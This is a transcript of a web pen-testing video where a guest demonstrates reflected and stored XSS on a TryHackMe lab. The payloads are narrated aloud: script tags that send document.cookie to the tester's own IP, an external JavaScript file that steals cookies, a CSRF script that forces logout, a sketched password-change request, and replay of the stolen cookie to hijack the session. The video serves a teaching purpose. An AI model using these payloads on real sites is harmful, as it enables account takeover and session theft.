Hey everyone, welcome back to Devil Ray Pen Testing. My name is Devil Ray with Cyber Warrior Studios. Today we are joined by a special guest, Qhum from Republic of Hackers. Qhum, why don't you go ahead and introduce yourself?
Hey, yeah, thanks for having me on. I'm Qhum. I do a lot of web app pen testing streaming over on Republic of Hackers. And go ahead, Delvery.
Awesome. Hey, again, I want to say thank you so much for joining me on this episode of Devil Ray Pen Testing. I biggest thing with my show is I'm here learning and trying to break into the world of penetration testing. And one of the things that I'm me personally lacking on is web app. And so this whole series is going to kick off a whole web app series. And as you can see here, guys, we're going to have a demonstration on cross-site scripting as he is on a website for Try Hack Me for the cross-site scripting playground. Today, he's going to show us reflected and stored cross-site scripting, uh, session stealing or session takeover, correct?
Session hijacking slash CSRF and cookie stealing.
Awesome. This is going to be fun. If you guys want their Discord information, will be down in the bottom along with their Twitter. You can find Qhum there and in Discord. Great guy, loves to help out. And then make sure you go. They also will have a YouTube channel. This video will be posted on the YouTube channel as well. So that information that will be down below as well. Please go over to the channel, hit subscribe. They have great content, great people in their Discord. Um, please go do that. They're a bunch of great people. So without further ado, let's go ahead and get started. Qhum, take it away.
Yeah, thanks so much. So like Delvery said, we're going to be doing reflected and stored cross-site scripting, otherwise known as XSS. So, if you're unfamiliar with cross-site scripting, it is an attack that basically allows you to inject malicious JavaScript directly into the browser. We won't get too far into the specifics of how the vulnerability is found, like through the code, but you are able to inject, say, like script tags, allowing you to execute JavaScript. So, for reflective XSS, the most common payload that everyone uses to first detect it is a script alert one, and then you kill the script at the end. And basically, what this will do it will spawn an alert box. And so, if I hit search and an alert box pops up, I can insert JavaScript code. And so here I see that the alert box one does pop up. And so that means my script alert one, as we see up in the URL up here, is being processed and executed. So there's two types of XSS. Well, there's actually multiple types, but the two types we will be talking about is reflected and stored. So reflective XSS is found when a get or post parameter, which a get parameter is this question mark keyword equals, and a post parameter is passed in the same way, but it won't be passed in the URL. It'll be passed inside the website HTTP information itself. So with a reflective XSS is we can just do an alert one in the vulnerable get query, and when we execute it, we will be able to execute XSS. Stored is a little worse because I need to create an account. So we'll create an account called uh, XSS for the password, register. Stored is even worse because, as the name suggests, it stores it on the server. So this, if I insert malicious JavaScript code here and do script alert 1 and hit comment, you'll see that the JavaScript is executed, right? But if I navigate away and then navigate back to it, sorry, running a little slow,
That's all good. It's Try Hack Me, right?
right? It's still being executed because my JavaScript is actually being stored on the slash stored URL. And that's because we added it as a comment. So here you can see my comment and nothing's there. And if we inspect element here, ID comments, and there we go. Here you can see my JavaScript being executed because it's taking my script tag and using the alert1 function. And so that's what stored XSS is. Whereas reflected, you notice when we went back, it didn't execute any JavaScript code because it's only being reflected back to us up here. But whereas in stored, it's stored on the actual page, and anyone who interacts with the page, our JavaScript will be executed. So does that all make sense so far, Devil Ray? Think I missed anything?
No, I think that's pretty well covered. I was gonna say where does it go because you can see where your account had logged in, but there's nothing there.
Hmm.
But because for me, like whenever I first learned it and actually ran this exact room, I saw that and I was like, how do I know it worked? Besides the fact of the alert, or if I, when trying to test out in the real world or out in the wild, you might be able to get that, but you don't know exactly what tags may or may not have been filtered, right?
Exactly. That's a fantastic point. Is that here we see no filtering, right? But they could have maybe filtered out like equal than and less than signs, or maybe they don't like the word script. Um, so using this inspect element, you can see exactly what's being filtered out very easily.
Yeah, and you can
It's a
kind of
fantastic point.
see that in the reflected side. I just noticed this myself. If you go back reflected and launch a reflected attack, you'll see that the slash is actually not as a slash anymore. It's actually
Yeah,
encoded.
it's being URL encoded once it's passed. Yes.
Yeah, and I know sometimes that can be an issue, correct? If it gets encoded.
Yeah, definitely if it's being encoded. But in our case, since this is just a get parameter, we can URL encode this and it'll still be passed properly. But sometimes they will encode it, like they'll change. For the life of me, I can't remember, but they'll change like this script tag to like I forget what it is, whatever. I think it's a hex value. So
Mm-hmm.
it'd be like something like this. And then obviously websites won't know what this is, so you won't be able to execute using less than or equal than signs.
Gotcha. Okay, so that's kind of a way to protect yourself or your website if you're trying to protect from cross-site scripting.
Definitely filtering out the greater than, less than equal signs, or the open tags and close tags, I guess people call them. It's one of the best ways, I would say,
Okay,
to protect.
fantastic.
Okay, so now that we know how cross-site scripting works, what can you actually do with this vulnerability? So I'm sure most of you already knew the alert one, right? That's one of the most, I'd say maybe the most popular web vulnerability out there. But from there, no one's ever really sure of what to do next. So here I have a HTTP uh, server running, and this works because it's an internal network. If config ton 0, and you can see my IP of 10.2.875. So what I'm going to do is I'm going to create a JavaScript payload that calls to my IP address, and when it calls it, I'm going to ask it to also send the cookie. So I will do script src equals http 10.2.875, which is my IP, and then I'll do a slash. I will close the script tag, and then I'll do document.cookie, which is the JavaScript's way of calling a cookie. Um, and then I will do this to close it, and this should call it. And so when I do this, it should call out to my IP address and send the cookie with this src equals. So let's run it, test it. I get it, and no cookies returned, so I did something wrong. Um, script src do I need a question mark here equals plus document.cookie. Let me see here. What did I do wrong? 10275 slash document dot slash question mark equals plus document dot cookie, and we run it again. For whatever reason, it's not returning me any cookies, but that's okay because sometimes you're going to run into an issue where it's not being returned properly. So another thing we can do is we can have it actually grab a script locally. So I have a few scripts built out here. The first one is actually used to steal cookies. As you can see, it's pretty much the exact same payload that I was using earlier. We have a function here, it's called add the image, and we call the function using the im.src, which helps bypass any filtering. And then we just call back to our IP address, and then we ask for the document.cookie like I was doing before. So if we instead do script src equals http 10.2.8.7.5 slash xss xss.js, and send that, we see that here we see it got our script, and then it executed our script of this script, which basically called the script for the cookie, and then it returned the cookie to us, which is s% whatever. And so now we successfully stole the user's cookie. So here, I actually have a cookie editor open, so that makes it easier. Don't have to use inspect element again. And so that is the correct cookie. And so we were able to steal the cookie. So while this is reflected and we'd have to do a bunch of other stuff, if we had a stored XSS and I put that in here, script src equals http 10.2.8.7.5 slash xss.js. It's good. Let's send it. Okay. Did I type it out right? Script src equals http.
Don't you need the closing script?
Shouldn't be required, but we can send it in anyways. Is it not processing properly?
I don't think it is because it looked like it was.
That's unusual.
Yeah.
Let me see here. Let's go back to reflected and let's test it again. I have it in my clipboard. Search. So it's not being called properly. Oh, still loading. So that is being called properly. Interesting.
So something in the stored side of the website is
Yeah,
not calling it
so
properly.
definitely not. If I were to guess, it may be stopping execution after the one. So we could actually just test and do script alert 2. And let's see if it's giving us an alert 2 when we refresh the page. 1, and we do get a 2, but it's not calling back to us properly. It's very interesting.
Yeah, and I also noticed that middle line of the cross-S or the XSS account.
Hmm.
That's also a weird thing of like shouldn't be that way. It kind of broke
Yeah, it
the
did
the
break.
code.
Slash br tag there. Script src equals 10.2.8.7.5. This definitely should be working. They must have something weird implemented here where we're unable to steal cookies. Or where we're unable to use an src tag would be my guess.
Maybe.
10.2.8.7.5.
Wait, aren't you trying to run it as an image source?
No, this I'm just going to use a script tag. We
Okay.
could do like an MIG and get rid of the closing script. That would also be valid. But for this, we were just trying to
Steal
call
the
back to
cookie.
ourselves. Yeah, steal the cookie. And like with an MIG tag, I guess if we're going there, we do like on air. Because if with this error, it's with this XSS, it's always going to be invalid.
Yeah, because there's nothing really there as an image if you're
Mhm.
pulling a code.
Exactly. Exactly. So for whatever reason, the stored is broken. I'm going to say.
Yep.
I didn't test the stored earlier. I was only testing this. As you see, I have all these tests here.
Yeah.
But it definitely should. Um, so that's how we would steal cookies. Um, so another thing you might want to do is do a session hijacking, which is basically where we're going to use what the current logged in user. We're going to execute commands and functions as the current logged in user. So unfortunately, this is kind of limited, and the only functionality I had was log out. So in that, we're gonna go here, target or proxy, intercept, turn intercept on for a minute, and hit log out. And so when we hit log out, we see the only function that is performed is just log out. Um, so while this might not be super interesting, logging people out of their sessions, we could think of how we could use this in other ways if this was a more advanced platform, such as changing passwords, um, adding new users if you can target an administrator user. Any of that kind of thing would be really useful. So we're going to kill burp, reload. So we're still logged in. So what I have here now is a logout script. And so what this script does is it calls a URL to slash logout, and then we're creating a new request, a new XML HTTP request, and we're basically telling it to run. So this little script right here will basically just say, hey, go to your current domain and slash logout, and that's all. Because we see when we go to slash logout, it logs us out. So if I were to call this script, which is right here, and hit search, we can see that it got it, get logout.js. And now when we go back to our session, we're logged out. We're no longer logged in. So while logging someone out might not be really what you are interested in doing, if there was like a ability to change a password, then we could say, hey, change, like admin password to a password of our choosing, and then we could log in as the administrator user.
Which would be bad for any website.
Definitely. You definitely don't want that. So just to show again, we run the script saying to log out. Once we refresh, the user is logged out, and we are completely logged out now. So that's how a session hijacking slash CSRF attack would work. You basically can run whatever the user can run. Um, you can run whatever the user can run. And basically, from there, you can perform several actions, changing passwords, creating new users, whatever kind of functionality the website has implemented, you can basically do as that user.
And you only need.
So, no, go ahead.
So the only you only need to run that essentially that what would be the logout.
Yeah,
You change it to something to where it would be like causing a password change or an email change.
yeah.
And
So, for example, if we were like, do change password, say,
mhm,
change this to like, say we're trying to change a password, right?
yeah,
And say, like, like, we'll make it easy and we'll just say, like, when we change the password, we'll just go to like account and then be like, password equals 1234, and confirm password equals 1234, right? Because they normally make you confirm it.
Yeah.
So say like this is the functionality that happens when we try and change our password. So what we will do is we'll just go here and we'll change the URL to account, right? Because when we don't specify like an HTTP or HTTPS URL,
Yeah.
JavaScript will just assume it's on our current domain.
Gotcha. Okay.
And we'll just do something like we'll declare a variable var query equals like the query,
Mm-hmm.
and then we'll just change URI plus query, and then this will change it.
Gotcha. And because it's you could use that as like a stored, you don't necessarily need to steal the victim's cookie.
You would not need to steal the victim's cookie, but like for example, in our case, let's just log out.
Yep.
Um, there's no ability to change passwords, right?
Yeah.
Maybe the users can't change their passwords, or maybe sometimes when you have to change your password, you have to enter your old password. Um, so maybe that's implemented, so you're not going to actually be able to. So instead, you steal the cookie, and I'm not sure if these cookies are still valid. I mean, they might be. And so, like, I'm logged out. If I just go here and I'll paste in my cookie, we'll see if the sessions are still valid. Probably not because I logged out. Yeah, probably not because I logged out. So we'll just do this XSS register. We'll go to reflected and we'll quickly steal our cookies with this one, send. And so now we have a valid cookie. And then we will go here, new private window, 10.10.7.2.30 was it?
Yep.
It was. And we'll paste in a valid cookie, hit save, refresh, and there we go. We logged in because we stole the session cookie. So if you have a website like this, or a lot of websites now, because of how big of a target XSS can be, will ask for the old password before you update the existing password.
Yeah.
So that way you can't steal an account like that. So you can steal a valid cookie, but as we saw earlier, once the user hits log out, the session cookie is no longer valid.
So
So you'll have to jump on it. But
yes. So
again, go ahead.
so
Sorry.
you pretty much have like a limited amount of time. You don't know when that user's gonna log out.
Hmm.
So you got a very limited
Exactly.
amount of time to, if you were being malicious, um, get in and get whatever you needed to.
Exactly. You would have a very limited amount of time uh, to do that.
And that,
But again, most users don't normally hit the logout button,
and that's
generally speaking.
and that's probably why there's a timeout for accounts nowadays.
Definitely one of the main reasons. Just because if you find an XSS and for whatever reason the stored won't work for us, let's just try it one more time. 10.2.8.7.5. We're not even going to ask for anything. We're just going to say call it to us. And I need to close this. SRC equals 10.2.8.7.5. Let me just double check my IP. 10.2.8.7.5. Comment. Let's let everything load. Okay, so the stored is broken. My guess is if we rebooted the box, it would be working again properly, or that they've sandboxed this so it's not allowing outside connections.
Yeah.
But usually that's how you would do it. So if you're looking for a website to do this on, you could use Bceptor. Um, and it basically just creates mock API endpoints. So what we're going to do is we're going to go here. We're going to go. I have too many tabs open now. There are too many things open. We're going to go here. We're going to go to reflected. And we're just going to start by doing script src equals. And we're just going to call our thing. Make sure we can connect first. Hit search and connection. So we see a get, right?
Okay.
And so now we can do, if it wants to work for us this time, plus document.cookie, search, Oh man, the document.cookie is not working. This is,
They may have sandboxed it to where that document.cookie might not work.
I suppose that's possible. I don't sure why they would bother doing that, but for whatever reason, the document.cookie they really don't like working. Whatever they have implemented is very unusual. Sorry, I should have tested this earlier.
Oh, it's fine.
Um,
The thing that this highlights is not everything works whenever you're trying to hack into a web app, and you got to continuously test in order to find something that
Definitely,
will work. I mean, this isn't something to where you just jump in and you immediately just have the answer. This is something to where it takes constant testing because to get to the script source equals payload, first you have to test to see what gets filtered out first and stuff like that until you can eventually come up with a proper payload that leads to whatever your intention is, whether it's to validate a vulnerability for a bug bounty program, or in worst case scenario, you have a cyber attacker coming in and doing malicious actions on a website.
definitely, definitely. Usually they're going to have some form of filter implemented. So you'll have to find some form of filter bypassing. So, exactly like you said, you're going to have to be testing out a ton of different things. Not everything's always going to work.
Yep, for sure.
All right.
Cool. I think that's it that you had in store for us, correct?
Yeah, that's about all.
Awesome. Well, again, I greatly appreciate you coming on and showing us a bunch of different things. I definitely learned a lot, especially with the B scepter. I never knew that existed, so I'll make sure to drop that down in the description bar. Um, Again, you can find him in the Republic of Hackers Discord. This video will also be posted on their YouTube channel as well, at the same time as this one. So please, if you see this on Cyberwar Studios, go over to Republic of Hackers, hit subscribe, hit that bell icon, do it for Cyberwar Studios as well, and enjoy the great content. And I highly recommend following them on Twitter and getting in that Discord. That Discord is a unbelievable amount of knowledge, and they have a very phenomenal environment. There's been nothing but greatness there. So go check them out. Um, Again, thank you, Qhum, for coming out. Maybe someday in the future we can have you come back out. We can maybe do red versus blue kind of deal, to where we go after a couple of sandbox websites ourselves and
Definitely.
go from there. Until next video, guys. Thank you so much. Have a good one. See you next time.